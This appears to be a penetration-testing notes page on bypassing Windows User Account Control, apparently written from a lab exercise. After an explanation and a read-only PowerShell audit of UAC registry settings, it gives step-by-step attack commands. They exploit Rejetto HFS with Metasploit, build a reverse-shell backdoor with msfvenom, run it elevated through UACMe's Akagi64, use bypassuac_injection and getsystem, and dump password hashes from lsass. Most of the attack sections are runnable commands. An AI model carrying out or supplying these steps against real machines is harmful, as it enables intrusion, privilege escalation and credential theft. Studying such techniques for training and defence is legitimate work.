# Bypassing UAC

User Account Control (UAC) is a **Windows security feature** introduced in **Windows Vista** to prevent **unauthorized system changes**. It ensures that any modification to the operating system **requires approval** from an administrator or a user with administrative privileges.

* **Non-privileged users** executing programs with elevated privileges will receive a **UAC credential prompt**.
* **Privileged users** will see a **UAC consent prompt** before the action is approved.


## **Bypassing**

To **bypass UAC**, an attacker must already be running as a member of the **local Administrators group** on the target system. Under UAC such a user normally runs with a filtered, medium-integrity token; a bypass obtains the full high-integrity token **without the consent prompt**.

* UAC **prompts users** before executing programs with administrative rights.
* UAC's **notification level is configurable** (from **Never notify** to **Always notify**). At any level **below Always notify**, certain built-in, signed Windows programs **auto-elevate without user confirmation**, and it is this behaviour that bypass techniques rely on.
* Various **tools and techniques** can be used to **bypass UAC**, depending on the Windows version.
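The notification level and the related policy values live in the registry, so a defender can audit them directly. The following read-only PowerShell check is an added example, not part of the original page; it maps the `ConsentPromptBehaviorAdmin` and `PromptOnSecureDesktop` values onto the slider wording and flags settings that leave room for a silent bypass.

```powershell
# Added example (not from the original page): audit the UAC policy values that
# decide whether an elevation prompt is shown. All operations are read-only.
$path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$p = Get-ItemProperty -Path $path

# A value that is absent from the registry behaves like the Windows default.
function Get-Val($name, $default) {
    if ($null -ne $p.$name) { [int]$p.$name } else { $default }
}

$enableLua   = Get-Val 'EnableLUA' 1                      # 1 = UAC on
$adminPrompt = Get-Val 'ConsentPromptBehaviorAdmin' 5     # 0,1,2,3,4,5
$userPrompt  = Get-Val 'ConsentPromptBehaviorUser' 3      # 0 = auto-deny
$secureDesk  = Get-Val 'PromptOnSecureDesktop' 1          # 1 = dimmed desktop
$tokenFilter = Get-Val 'LocalAccountTokenFilterPolicy' 0  # 1 = no remote filtering

# Translate the raw values into the wording of the UAC slider.
$level = switch ($true) {
    ($adminPrompt -eq 2 -and $secureDesk -eq 1) { 'Always notify (highest)'; break }
    ($adminPrompt -eq 5 -and $secureDesk -eq 1) { 'Notify when apps try to make changes (default)'; break }
    ($adminPrompt -eq 5 -and $secureDesk -eq 0) { 'Notify without dimming the desktop'; break }
    ($adminPrompt -eq 0)                        { 'Never notify (prompts disabled)'; break }
    default { "Custom (Admin=$adminPrompt, SecureDesktop=$secureDesk)" }
}

# Collect the weaknesses a reviewer would raise.
$findings = @()
if ($enableLua -ne 1)   { $findings += 'EnableLUA=0: UAC is switched off entirely' }
if ($adminPrompt -eq 0) { $findings += 'ConsentPromptBehaviorAdmin=0: administrators elevate silently' }
if ($adminPrompt -eq 5) { $findings += 'ConsentPromptBehaviorAdmin=5: built-in Windows binaries auto-elevate without a prompt; set 2 (Always notify) to close this' }
if ($secureDesk -ne 1)  { $findings += 'PromptOnSecureDesktop=0: the prompt is not on the secure desktop' }
if ($tokenFilter -eq 1) { $findings += 'LocalAccountTokenFilterPolicy=1: local admin accounts get a full token over the network' }

[pscustomobject]@{
    UacEnabled          = ($enableLua -eq 1)
    NotificationLevel   = $level
    AdminPromptBehavior = $adminPrompt
    UserPromptBehavior  = $userPrompt
    SecureDesktop       = ($secureDesk -eq 1)
    Findings            = if ($findings) { $findings -join '; ' } else { 'No weak settings found' }
} | Format-List
```

Run it in an elevated or non-elevated session alike; reading this key needs no special rights, and a result of `Always notify` with `SecureDesktop = True` is the configuration that removes the auto-elevate path the bypass tools below depend on.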


## **UACMe**

**UACMe** is an **open-source** and **powerful** privilege escalation tool. It automates **UAC bypass techniques** to execute processes with **elevated privileges** without triggering UAC prompts.

{% embed url="https://github.com/hfiref0x/UACME" %}

It provides a comprehensive and well-documented list of methods for bypassing UAC across multiple Windows versions, from Windows 7 to Windows 10. By abusing the built-in Windows auto-elevate mechanism, it lets an attacker who already holds an administrator account run a payload on the target with elevated privileges and no consent prompt.

{% code overflow="wrap" %}

```bash
## TARGET MACHINE

# Lists all user accounts on the system. This command helps identify available user accounts, including standard and administrator accounts.
net users

# Displays the members of the local Administrators group.
net localgroup administrators
```

{% endcode %}

{% code overflow="wrap" %}

```bash
## ATTACKER MACHINE

nmap [TARGET IP]

# w/ Metasploit
msfconsole
setg RHOSTS [TARGET IP]
search rejetto
use exploit/windows/http/rejetto_hfs_exec
show options
exploit
```

{% endcode %}

{% code overflow="wrap" %}

```bash
## TARGET MACHINE using meterpreter

# target machine local enumeration
sysinfo
pgrep explorer
# alternatively:
ps -S explorer.exe
migrate 2448
getsystem # elevation check
getuid
getprivs
shell
net user
net localgroup administrators

## ATTACKER MACHINE

# using UACMe
# Source > Akagi
# Default Settings required. Run executable from command line: 
akagi32 [Key] [Param] 
# or 
akagi64 [Key] [Param]
# First parameter is number of method to use, second is optional command (executable file name including full path) to run. Second parameter can be empty - in this case program will execute elevated cmd.exe from system32 folder.
# binary needs to be compiled

# meterpreter payload > upload that to the target > bypass UAC to execute this
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACKER IP] LPORT=[PORT] -f exe > backdoor.exe

# multi handler setup
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [ATTACKER IP]
set LPORT [PORT]
exploit

## TARGET MACHINE using meterpreter

pwd
getuid
getprivs
cd C:\\
mkdir Temp
cd Temp
upload backdoor.exe
upload Akagi64.exe
Akagi64.exe 23 backdoor.exe

# new meterpreter session with elevated privilege in the handler
```

{% endcode %}

I started by gathering basic information on the **target machine**, listing all user accounts (`net users`) and identifying members of the **Administrators group** (`net localgroup administrators`). Then, from the **attacker machine**, I scanned the target using **Nmap** to identify open ports and services.

I leveraged **Metasploit** to exploit the **Rejetto HFS** vulnerability, gaining an initial foothold on the target. Once inside, I used **Meterpreter** to enumerate system details (`sysinfo`), check running processes (`pgrep explorer`), migrate to a stable process, and verify privileges.

To escalate privileges, I utilized **UACMe**, an open-source privilege escalation tool, to bypass User Account Control (UAC). I created a **Meterpreter payload** using `msfvenom`, uploaded it to the **target machine**, and executed it with elevated privileges using **UACMe** (`Akagi64.exe 23 backdoor.exe`).

Finally, I set up a **multi-handler** on Metasploit to catch the reverse shell connection from the backdoor, successfully establishing a **new Meterpreter session** with **elevated privileges** on the target.

## Memory Injection w/ Metasploit

```bash
use exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

getsystem
getuid

ps -S lsass.exe
migrate 484

hashdump
```

I used the **bypassuac\_injection** exploit to escalate privileges on a Windows machine. After setting the session and payload, I executed the exploit.

Once inside, I ran **getsystem** to gain **SYSTEM privileges** and confirmed my user identity with **getuid**.

Next, I listed processes searching for **lsass.exe** and migrated to its PID (**484**) for stability. Finally, I dumped password hashes using **hashdump** for credential extraction.
